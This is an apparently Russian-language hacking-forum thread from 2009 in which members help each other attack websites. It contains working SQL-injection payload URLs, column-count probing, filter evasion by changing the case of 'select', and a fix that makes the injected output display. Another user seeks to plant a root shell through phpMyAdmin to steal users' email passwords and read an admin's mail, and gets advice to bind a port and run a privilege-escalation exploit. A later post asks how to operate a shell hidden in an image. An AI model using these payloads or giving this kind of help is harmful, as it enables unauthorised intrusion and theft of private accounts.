Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    А смотрите допустим я нашёл дырку
    site.ru/news.php?id=1+union+select+1,2--
    Теперь нам надо вывести мои 1,2
    Но есть я делаю так
    site.ru/news.php?id=1999+union+select+1,2--
    или
    site.ru/news.php?id=-1+union+select+1,2--

    То идёт 404 :(
    Как быть?
    Это 100% редирект идёт так-как новость не найдена...а SQL-inj Есть
     
    #6541 Byrger, 12 Apr 2009
    Last edited: 12 Apr 2009
  2. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    чиво???
     
  3. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Чиво чиво
    Ячейки 1 2 надо на экран вывести...
     
  4. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Byrger ну че ты мозг колупашь всем? Тебе дали ответ уже во 2-ом посту сверху...
     
  5. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Дак идёт ридерект на 404 при нормальном запросе к бд! Вы читать то умеете?
    Я изменяю id На несуществующий и возникает 404 а не в инъекции у меня ошибка!
     
  6. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    А ты уверен, что там 2 поля и именно такой комментарий работает?
     
  7. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Byrger
    может стоять защита, от скулей, попробуй поэксперементировать со словами в инъекции
     
  8. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    тоесть в место
    site.ru/news.php?id=-1+union+select+1,2--
    нуно
    site.ru/news.php?id=-1+union+selecT+1,2--
    site.ru/news.php?id=-1+union+seLecT+1,2--
    ну и далее пока ошибка не изчезнит.... (хотя не факт что изчезнет :) )
     
    #6548 farex, 12 Apr 2009
    Last edited: 12 Apr 2009
  9. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    А может работать как с блайндом?! =\
    ....
    Либо попытаться передавать параметры постом...
     
  10. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Пля ну не телепаты мы, дай работающий параметр, там посмотим...
     
  11. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    мну кажется,что может....... ИМХО
     
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    site.ru/news.php?id=1+group+by+10-- 404
    site.ru/news.php?id=1+group+by+5-- 404
    site.ru/news.php?id=1+group+by+3-- 404
    site.ru/news.php?id=1+group+by+2-- ok
    site.ru/news.php?id=1+union+select+1,2-- ok
    site.ru/news.php?id=-1+union+select+1,2-- 404
    site.ru/news.php?id=1999+union+select+1,2-- 404

    site.ru/news.php?id=1999+or+1=1+union+select+1,2-- ok
     
    #6552 Byrger, 12 Apr 2009
    Last edited: 12 Apr 2009
  13. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    У меня такой вопрос а можно через phpMyAdmin залить шел с правими root! А то шел тоит токо читаю папки сайта! пробовал поднять права не получается. А нужно узнать пароли на мыло все юзеров
     
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Byrger
    попробуй
    site.ru/news.php?id=1+and+1=2+union+select+1,2--
     
    1 person likes this.
  15. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4

    ДЕРЖИ КУЧУ ++++
     
  16. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    root мускуля и root ОС - это не одно и тоже, так что нельзя. Бинди порт, ищи сплойт, рутай.
     
  17. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    сплоит юзал ничего не помогло там стоит FreeBSD 6.2-RELEASE
    есть один сплоит http://milw0rm.com но не подходит! А очень нужно почту админа почитать
     
  18. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    У меня нод32 всё время ругается на ИП
    89.111.176.83 по порту 21

    PHP:
    12.04.2009 12:31:52    Обнаружена атака Reverse TCP Desynchronization    89.111.176.83:21    192.168.0.100:4456    TCP
    Подскажите что он пытается сделать на 21 порту
    И что это за порт?

    Причём локальные порты меняются...
    4456
    4795
    1746
    2282
    Тип атаки 1 и тот-же
    В чём уязвимость моей машины?
     
    #6558 Byrger, 12 Apr 2009
    Last edited: 12 Apr 2009
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    21 - FTP
     
  20. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Если залил шелл в картинке, то как им управлять?
    Ну вроде как шелл загркузается аж нод заорал...
    Но как его откруть для работы?
     
Thread Status:
Not open for further replies.